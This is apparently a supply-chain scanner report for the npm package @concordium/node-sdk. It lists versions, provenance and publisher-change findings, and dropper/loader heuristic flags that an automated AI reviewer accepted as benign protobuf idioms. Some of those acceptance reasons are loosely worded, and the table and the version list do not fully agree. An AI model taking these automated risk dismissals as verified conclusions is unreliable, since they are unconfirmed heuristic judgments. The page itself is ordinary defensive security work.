@concordium/node-sdk
Helpers for interacting with the Concordium node
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:grpc/google/protobuf/wrappers_pb.js | AI (source-diff): Auto-generated google-protobuf stub; Function('return this')() is a standard global-object idiom in google-protobuf generated code, not malicious dynamic execution. | ai | |
| source-diff | net-exec-file:grpc/concordium_p2p_rpc_pb.js | AI (source-diff): Auto-generated protobuf JS code from google-protobuf toolchain. Function('return this')() is a standard global-object idiom in protobuf-generated JS, not malicious dynamic execution. | ai | |
| maintainer-change | maintainer-added | AI (maintainer-change): Publisher change concordium-joe → concordium-shj occurred in 2022 and is a documented internal Concordium team transition; concordium-shj has 89 approved packages and 0 rejections. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): google-protobuf is a well-known Google library used for gRPC/protobuf communication, appropriate for a blockchain node SDK. | ai | |
| semgrep | semgrep:hex-decode | AI (semgrep): Hex decoding is used for cryptographic address derivation (SHA256 of credential IDs) — expected and legitimate for a blockchain SDK. | ai | |
| source-diff | net-exec-file:lib/grpc/grpc/concordium_p2p_rpc_pb.js | AI (source-diff): File is auto-generated protobuf/gRPC code (// GENERATED CODE -- DO NOT EDIT!). Function('return this')() is a standard Google protobuf-js global-object idiom, not malicious dynamic execution. | ai | |
| provenance | no-provenance | AI (provenance): Provenance attestation is a best-practice enhancement, not a security requirement. Package has legitimate repo and publisher history. | ai | |
| publish-pattern | rapid-publish | AI (publish-pattern): Rapid publishes are routine for patch releases; no material changes in this version support benign intent. | ai | |
| dependencies | unvetted-dep:@concordium/common-sdk | AI (dependencies): Sibling package from the same Concordium organization; expected dependency for this SDK across all versions. | ai | |
| dependencies | unvetted-dep:@protobuf-ts/grpc-transport | AI (dependencies): Well-known protobuf gRPC transport library; expected dependency for a gRPC-based blockchain SDK. | ai | |
| provenance | publisher-changed | AI (provenance): Publisher transition occurred Oct 2023; new publisher has maintained clean record (26 approved packages) since then. | ai | |
| dependencies | unvetted-dep:google-protobuf | AI (dependencies): google-protobuf is standard for gRPC; essential for this SDK's core functionality. | ai | |
| semgrep | semgrep:base64-decode | AI (semgrep): Base64 decoding in wallet crypto module is legitimate key derivation using PBKDF2; standard for cryptographic wallet implementations. | ai |
Versions (showing 37 of 37)
| Version | Deps | Published |
|---|---|---|
| 9.5.3 | 5 / 21 | |
| 9.5.2 | 5 / 21 | |
| 9.5.1 | 5 / 21 | |
| 9.4.0 | 5 / 21 | |
| 9.3.0 | 5 / 21 | |
| 9.2.0 | 5 / 21 | |
| 9.1.1 | 5 / 21 | |
| 9.1.0 | 5 / 21 | |
| 9.0.0 | 5 / 21 | |
| 8.0.0 | 5 / 21 | |
| 7.0.0 | 5 / 21 | |
| 6.4.0 | 5 / 21 | |
| 6.3.0 | 5 / 21 | |
| 6.2.0 | 5 / 21 | |
| 6.1.0 | 4 / 18 | |
| 6.0.0 | 4 / 18 | |
| 5.0.0 | 4 / 18 | |
| 4.0.0 | 4 / 18 | |
| 3.0.2 | 4 / 18 | |
| 3.0.1 | 4 / 18 | |
| 3.0.0 | 4 / 18 | |
| 2.1.1 | 4 / 18 | |
| 2.1.0 | 4 / 18 | |
| 2.0.2 | 4 / 18 | |
| 2.0.0 | 3 / 18 | |
| 1.1.0 | 5 / 19 | |
| 1.0.0 | 5 / 19 | |
| 0.7.3 | 5 / 19 | |
| 0.7.2 | 4 / 19 | |
| 0.7.1 | 4 / 19 | |
| 0.6.0 | 4 / 19 | |
| 0.5.1 | 4 / 19 | |
| 0.4.0 | 4 / 17 | |
| 0.3.0 | 4 / 17 | |
| 0.2.5 | 4 / 17 | |
| 0.2.4 | 4 / 17 | |
| 0.1.9 | 4 / 17 |
v9.5.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.5.2
2 findingsPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2023-10-20. This could indicate a legitimate maintainer transition or an account compromise.
v9.5.1
3 findingsThis version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: soerenbz.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2023-10-19. This could indicate a legitimate maintainer transition or an account compromise.
v9.4.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.3.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.2.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.1.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.1.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.0.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v8.0.0
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2023-06-27. This could indicate a legitimate maintainer transition or an account compromise.
v7.0.0
2 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.4.0
2 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.3.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.2.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.1.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.0.0
2 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v5.0.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.0.0
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-08-26. This could indicate a legitimate maintainer transition or an account compromise.
v3.0.2
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-26. This could indicate a legitimate maintainer transition or an account compromise.
v3.0.1
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-26. This could indicate a legitimate maintainer transition or an account compromise.
v3.0.0
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-25. This could indicate a legitimate maintainer transition or an account compromise.
v2.1.1
3 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-08. This could indicate a legitimate maintainer transition or an account compromise.
v2.1.0
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-07. This could indicate a legitimate maintainer transition or an account compromise.
v2.0.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v2.0.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.1.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.7.3
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-05-06. This could indicate a legitimate maintainer transition or an account compromise.
v0.7.2
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-05-05. This could indicate a legitimate maintainer transition or an account compromise.
v0.7.1
3 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-03-09. This could indicate a legitimate maintainer transition or an account compromise.
v0.6.0
3 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-02-10. This could indicate a legitimate maintainer transition or an account compromise.
v0.5.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.2.5
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.2.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.1.9
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.